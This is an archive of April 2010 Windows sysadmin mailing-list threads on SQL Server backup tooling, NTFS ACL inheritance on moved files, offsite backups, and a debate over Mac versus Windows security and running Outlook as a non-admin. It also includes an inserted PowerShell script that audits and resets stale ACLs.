http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796


Jay Dale
I.T. Manager, 3GiG
Mobile: 713.299.2541
Email: jay.d...@3-gig.com



From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org]
Sent: Wednesday, April 28, 2010 11:40 AM
To: NT System Admin Issues
Subject: SQL Server 2005 management suite


Greetings!

I have a server (Win 2003) with MS SQL Server 2005 (not "Express") on it as a 
part of my VMWare management system.  I need to back up this database.  It does 
_not_ have the "Management Suite" installed.  I do not believe I have the 
license key for that installation, either.

I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS Library" CD).  
I also have the download for SQL Server 2005 Express Management Suite.

What is the least bad way to get MS management (again, just for DB backup) onto 
this machine?

I figure the "Express" version will not work with "Full" SQL Server, right?

If I were to use one of the "Full" setup disks and run "Setup", would I have 
the option of modifying (i.e., adding Management Suite) to the current install and 
existing database?  Is this reasonably safe to do?

I've obviously never before run SQL Server setup before - thanks!
--
Richard D. McClary
Systems Administrator, Information Technology Group
ASPCA(r)
1717 S. Philo Rd, Ste 36
Urbana, IL  61802

richardmccl...@aspca.org

P: 217-337-9761
C: 217-417-1182
F: 217-337-9761
www.aspca.org



RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Crawford, Scott
The values you want are

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ForceCopyAclwithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MoveSecurityAttributes

This KB details this:

http://support.microsoft.com/kb/310316


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 12:08 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

+infinity

We do exactly what you describe, and I always have issues (mostly when
doing file migrations due to server moves) related to people copying
files from one secured directory to another and the permissions not
getting updated.  When the permissions are set to inherit from parent,
it seems to me that Windows should re-assess that on a file copy.

Bill Mayo 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 12:45 PM
To: NT System Admin Issues
Subject: The finer points of NTFS ACLs (was: Software installs on new
PCs)

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin wrote:
> We see this problem where people create folders under shared drives,
> that each new folder is owned by the creating user who then has the
> added rights.
> The solution is some weekly subinacl tasks that re-take ownership of
> the whole fileserver structure back to BUILTIN\Administrators

  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

  All our shared folders are set so only the group(s) which should have
permission are present.

  The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant "CREATOR
OWNER" "Modify" on "Files only".  Now users can create the file, but
can't touch anything else.

  My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a file
is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben

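The stale-ACL situation described in this thread (a file moved within one volume keeps the inherited ACEs of its old folder) can be audited from the file server. The following is an added example, not code from any poster in the thread; the share path is hypothetical, and the check is a heuristic that compares trustees and Allow/Deny only, not the individual rights.

```powershell
# Added example, not from the thread. Heuristic audit: a file's inherited ACEs
# should name the same trustees that its current parent folder hands down to
# files. A file moved within the volume still carries its old folder's trustees.

$SidType       = [System.Security.Principal.SecurityIdentifier]
$ObjectInherit = [int][System.Security.AccessControl.InheritanceFlags]::ObjectInherit
$CreatorSids   = 'S-1-3-0', 'S-1-3-1'   # CREATOR OWNER, CREATOR GROUP

function Get-TrusteeKeys {
    # Reduce a set of access rules to unique "Allow|SID" / "Deny|SID" strings.
    param($Rules)
    $keys = foreach ($r in $Rules) {
        '{0}|{1}' -f $r.AccessControlType, $r.IdentityReference.Value
    }
    @($keys | Where-Object { $_ } | Sort-Object -Unique)
}

function Find-StaleInheritedAcl {
    # Checks files directly inside $Folder (moved subfolders are not examined).
    param([Parameter(Mandatory = $true)][string]$Folder)

    $parentAcl = Get-Acl -LiteralPath $Folder
    # Only ACEs flagged ObjectInherit are passed from a folder to its files.
    $inheritable = @($parentAcl.GetAccessRules($true, $true, $SidType) |
        Where-Object { ([int]$_.InheritanceFlags -band $ObjectInherit) -ne 0 })
    # CREATOR OWNER is replaced by the file owner's SID when inherited, so it is
    # left out of the expected set and tolerated on the file side below.
    $hasCreatorOwner = @($inheritable |
        Where-Object { $_.IdentityReference.Value -eq 'S-1-3-0' }).Count -gt 0
    $expected = Get-TrusteeKeys ($inheritable |
        Where-Object { $CreatorSids -notcontains $_.IdentityReference.Value })

    foreach ($file in Get-ChildItem -LiteralPath $Folder -File) {
        $acl = Get-Acl -LiteralPath $file.FullName
        if ($acl.AreAccessRulesProtected) { continue }  # inheritance disabled on purpose
        $owner  = $acl.GetOwner($SidType).Value
        # Inherited ACEs only; explicit ACEs on the file are a separate question.
        $actual = Get-TrusteeKeys ($acl.GetAccessRules($false, $true, $SidType))

        $missing = @($expected | Where-Object { $actual -notcontains $_ })
        $extra   = @($actual | Where-Object { $expected -notcontains $_ } |
            Where-Object { -not ($hasCreatorOwner -and $_.EndsWith("|$owner")) })

        if ($missing.Count -or $extra.Count) {
            [pscustomobject]@{
                Path    = $file.FullName
                Missing = $missing -join ', '   # folder grants these, file lacks them
                Extra   = $extra -join ', '     # file carries these from elsewhere
            }
        }
    }
}

function Reset-ToInheritedAcl {
    # icacls /reset replaces the file's ACL with the default inherited ACL
    # of the folder it now lives in.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true)]
        [string]$Path
    )
    process {
        if ($PSCmdlet.ShouldProcess($Path, 'icacls /reset')) {
            & icacls.exe $Path /reset | Out-Null
            if ($LASTEXITCODE -ne 0) { Write-Warning "icacls failed for $Path" }
        }
    }
}

# Hypothetical share path; review the report, then drop -WhatIf to apply.
$share = 'D:\Shares\GeneralRelease'
if (Test-Path -LiteralPath $share) {
    $stale = @(Find-StaleInheritedAcl -Folder $share)
    $stale | Format-Table -AutoSize
    $stale | Reset-ToInheritedAcl -WhatIf
}
```

Resetting an ACL needs the Change Permissions right on each file, so this is meant to run from an administrative account on the file server rather than by granting that right to the users who move the files.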



RE: backup software solution for offsite

2010-04-28 Thread Charlie Kaiser
Are you saying your OWN datacenter? Or a hosted server in someone else's
datacenter?

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com] 
> Sent: Wednesday, April 28, 2010 10:19 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
> 
> I wish to not hosted on a third party cloud, rather just host 
> on our own server at the data center.
> and Mozy good, but we want a image snapshot.
> 
> Thanks
> 
> 
> On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser 
>  wrote:
> 
> 
>   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>   
> 
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   > Sent: Wednesday, April 28, 2010 10:08 AM
>   > To: NT System Admin Issues
>   > Subject: backup software solution for offsite
>   >
>   > I have a need to set up offsite backups via an ipsec tunnel,
>   > thru sftp, ftp or smb.
>   > Something we can take daily inc snapshots and send over the
>   > internet using vpn, that has retention rules and alerts to
>   > admin (me) if a backup fails.
>   > Any commercial product, any ideas?
>   >
>   > Thanks
>   >
>   >
>   > --
>   > Justin
>   > IT-TECH
>   >
>   
> 
> 
> 
> 
> --
> Justin
> IT-TECH
> 
> 
>  
> 
>  
> 
> 




Re: WTF? Fake AV

2010-04-28 Thread Phil Brutsche
My experience has been varied on the issue.

A basic Outlook install works fine without local admin.

Things change when you start using Outlook add-ins. Some aren't as well
behaved as others.

On 4/28/2010 12:27 PM, Steven M. Caesare wrote:
> I’ve supported email since Outlook eclipsed the “Exchange Client”, on
> platforms since NT4.0 and I don’t recall this.


-- 

Phil Brutsche
p...@optimumdata.com



Re: WTF? Fake AV

2010-04-28 Thread Phil Brutsche
Office '97 absolutely had problems with the spell checker when you
weren't local admin. There were permissions changes you could make to
the registry keys to work around the issue.

In my experience Office 2000 was the first version to fix that.

On 4/28/2010 12:25 PM, Maglinger, Paul wrote:
> Microsoft Office used to have issues with spell check and some other
> tools unless you elevated the user to Power User.  I believe it might
> have been Office 2000.  I don’t believe the issue exists anymore.

-- 

Phil Brutsche
p...@optimumdata.com



RE: WTF? Fake AV

2010-04-28 Thread Steven M. Caesare
I've supported email since Outlook eclipsed the "Exchange Client", on
platforms since NT4.0 and I don't recall this.

 

-sc

 

From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 1:21 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

 

I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.

 

Bill Mayo

 



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
> stated reason was interesting as well.  As I interpret it, he says that
> in most any browser it is easy to find bugs (in which he can place
> things into memory), but that the actual exploit is easier in Mac OS
> because "I put the code into a process and I know exactly where it's
> going to be".  I have to assume that is a browser issue, not an OS
> issue, because Mac OS X has been using "system library randomization"
> for a while now.  (I understand that the OS needs to control/limit what
> the application does.)  As I have said before on this forum, you can say
> what you will about the reasons why there is an extremely minimal amount
> of malware on the Mac as compared to Windows (70,000 new per day!), but
> the fact remains that you are much "safer" running Mac OS X today than
> you are Windows.  Mac OS X does have some issues that need to be
> addressed, and I think you will see more of that real soon now, as they
> have recently had some high profile hires in that area.
>
> That said, I still think the original statement that the "security model
> is better" is something of a different animal.  The security model to me
> is more of a general philosophy of how the user relates to the operating
> system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
> least-privilege model and has since day 1.  Whether designed for it or
> not, that has not been the model in use in the Windows world until
> relatively recently.  I mean, when you cannot even run Outlook without
> elevated permissions, it becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is obviously
> > > much better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn2Own champ three years running, hacks Macs
> by choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>

RE: WTF? Fake AV

2010-04-28 Thread Steven M. Caesare
Likewise. I dunno what Bill is experiencing.

 

-sc

 

From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

 

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
> stated reason was interesting as well.  As I interpret it, he says that
> in most any browser it is easy to find bugs (in which he can place
> things into memory), but that the actual exploit is easier in Mac OS
> because "I put the code into a process and I know exactly where it's
> going to be".  I have to assume that is a browser issue, not an OS
> issue, because Mac OS X has been using "system library randomization"
> for a while now.  (I understand that the OS needs to control/limit what
> the application does.)  As I have said before on this forum, you can say
> what you will about the reasons why there is an extremely minimal amount
> of malware on the Mac as compared to Windows (70,000 new per day!), but
> the fact remains that you are much "safer" running Mac OS X today than
> you are Windows.  Mac OS X does have some issues that need to be
> addressed, and I think you will see more of that real soon now, as they
> have recently had some high profile hires in that area.
>
> That said, I still think the original statement that the "security model
> is better" is something of a different animal.  The security model to me
> is more of a general philosophy of how the user relates to the operating
> system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
> least-privilege model and has since day 1.  Whether designed for it or
> not, that has not been the model in use in the Windows world until
> relatively recently.  I mean, when you cannot even run Outlook without
> elevated permissions, it becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is obviously
> > > much better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn2Own champ three years running, hacks Macs
> by choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>

RE: WTF? Fake AV

2010-04-28 Thread Maglinger, Paul
Microsoft Office used to have issues with spell check and some other
tools unless you elevated the user to Power User.  I believe it might
have been Office 2000.  I don't believe the issue exists anymore.

 

 

From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 12:21 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

 

I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.

 

Bill Mayo

 



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
> stated reason was interesting as well.  As I interpret it, he says that
> in most any browser it is easy to find bugs (in which he can place
> things into memory), but that the actual exploit is easier in Mac OS
> because "I put the code into a process and I know exactly where it's
> going to be".  I have to assume that is a browser issue, not an OS
> issue, because Mac OS X has been using "system library randomization"
> for a while now.  (I understand that the OS needs to control/limit what
> the application does.)  As I have said before on this forum, you can say
> what you will about the reasons why there is an extremely minimal amount
> of malware on the Mac as compared to Windows (70,000 new per day!), but
> the fact remains that you are much "safer" running Mac OS X today than
> you are Windows.  Mac OS X does have some issues that need to be
> addressed, and I think you will see more of that real soon now, as they
> have recently had some high profile hires in that area.
>
> That said, I still think the original statement that the "security model
> is better" is something of a different animal.  The security model to me
> is more of a general philosophy of how the user relates to the operating
> system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
> least-privilege model and has since day 1.  Whether designed for it or
> not, that has not been the model in use in the Windows world until
> relatively recently.  I mean, when you cannot even run Outlook without
> elevated permissions, it becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is obviously
> > > much better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn2Own champ three years running, hacks Macs
> by choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>

RE: WTF? Fake AV

2010-04-28 Thread Mayo, Bill
You know, the more I think about it, it may have been Outlook 97 with
Windows 2000.  Regardless, Windows 2000 was the first user OS using the
NT security model, and the completely necessary email client that was
then available would not work in a least-privileged mode, which was my
intended point.  Sorry for any confusion I generated with my spotty
memory.
 
Bill Mayo



From: Mayo, Bill 
Sent: Wednesday, April 28, 2010 1:21 PM
To: 'NT System Admin Issues'
Subject: RE: WTF? Fake AV


I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.
 
Bill Mayo



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV


No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  


On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:


I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated
permissions, it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
> stated reason was interesting as well.  As I interpret it, he says that
> in most any browser it is easy to find bugs (in which he can place
> things into memory), but that the actual exploit is easier in Mac OS
> because "I put the code into a process and I know exactly where it's
> going to be".  I have to assume that is a browser issue, not an OS
> issue, because Mac OS X has been using "system library randomization"
> for a while now.  (I understand that the OS needs to control/limit what
> the application does.)  As I have said before on this forum, you can say
> what you will about the reasons why there is an extremely minimal amount
> of malware on the Mac as compared to Windows (70,000 new per day!), but
> the fact remains that you are much "safer" running Mac OS X today than
> you are Windows.  Mac OS X does have some issues that need to be
> addressed, and I think you will see more of that real soon now, as they
> have recently had some high profile hires in that area.
>
> That said, I still think the original statement that the "security model
> is better" is something of a different animal.  The security model to me
> is more of a general philosophy of how the user relates to the operating
> system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
> least-privilege model and has since day 1.  Whether designed for it or
> not, that has not been the model in use in the Windows world until
> relatively recently.  I mean, when you cannot even run Outlook without
> elevated permi

RE: WTF? Fake AV

2010-04-28 Thread Steven M. Caesare
Let's not put words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from a security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me why
> you think the *current* Windows security model is so much better than the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x security
> model would be stronger than Windows, as at least in Linux, if you try to
> install something as a user it simply fails stating you don't have permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At least
> that's the way I see things (from a limited experience with Win Vista and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's held
> true for many a platform, and isn't really germane to what we are discussing
> here.
>
> B) MS provided that info to HW devs FAR in advance.
>
>
> The point is, carrying forward a user base in the 100's of millions and an app
> base in the 10's of thousands requires some significant transitioning. Now
> you can argue their timing all you want, but the OP's comment had two
> basic tenets that bear on this:
>
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
>
> 2) He was discussing the OS, not the apps written for them
>
> Using AV infection #'s to compare those things and draw the conclusion he
> did is not accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare
> >  wrote:
> > >> " But when Microsoft wants to, say, create a new API for something,
> > >> they just do, and abandon the old one, and everyone else has to play
> > >> catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >



RE: WTF? Fake AV

2010-04-28 Thread Mayo, Bill
I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.
 
Bill Mayo



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV


No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  


On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:


I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated
permissions, it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
> stated reason was interesting as well.  As I interpret it, he says that
> in most any browser it is easy to find bugs (in which he can place
> things into memory), but that the actual exploit is easier in Mac OS
> because "I put the code into a process and I know exactly where it's
> going to be".  I have to assume that is a browser issue, not an OS
> issue, because Mac OS X has been using "system library randomization"
> for a while now.  (I understand that the OS needs to control/limit what
> the application does.)  As I have said before on this forum, you can say
> what you will about the reasons why there is an extremely minimal amount
> of malware on the Mac as compared to Windows (70,000 new per day!), but
> the fact remains that you are much "safer" running Mac OS X today than
> you are Windows.  Mac OS X does have some issues that need to be
> addressed, and I think you will see more of that real soon now, as they
> have recently had some high profile hires in that area.
>
> That said, I still think the original statement that the "security model
> is better" is something of a different animal.  The security model to me
> is more of a general philosophy of how the user relates to the operating
> system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
> least-privilege model and has since day 1.  Whether designed for it or
> not, that has not been the model in use in the Windows world until
> relatively recently.  I mean, when you cannot even run Outlook without
> elevated permissions, it becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their securit

Outlook 2K3 as non admin (was RE: WTF? Fake AV)

2010-04-28 Thread David Lum
Outlook 2003 doesn't work as a regular user? I have seen issues if 2003 was 
configured for a local admin and then they are removed from local admin, but I 
have Outlook 2003 working for non-admins and have for some years now.

Dave

-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 10:03 AM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

That one sent me to Google.  The quote is accurate, but I thought the
stated reason was interesting as well.  As I interpret it, he says that
in most any browser it is easy to find bugs (in which he can place
things into memory), but that the actual exploit is easier in Mac OS
because "I put the code into a process and I know exactly where it's
going to be".  I have to assume that is a browser issue, not an OS
issue, because Mac OS X has been using "system library randomization"
for a while now.  (I understand that the OS needs to control/limit what
the application does.)  As I have said before on this forum, you can say
what you will about the reasons why there is an extremely minimal amount
of malware on the Mac as compared to Windows (70,000 new per day!), but
the fact remains that you are much "safer" running Mac OS X today than
you are Windows.  Mac OS X does have some issues that need to be
addressed, and I think you will see more of that real soon now, as they
have recently had some high profile hires in that area.

That said, I still think the original statement that the "security model
is better" is something of a different animal.  The security model to me
is more of a general philosophy of how the user relates to the operating
system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege model and has since day 1.  Whether designed for it or
not, that has not been the model in use in the Windows world until
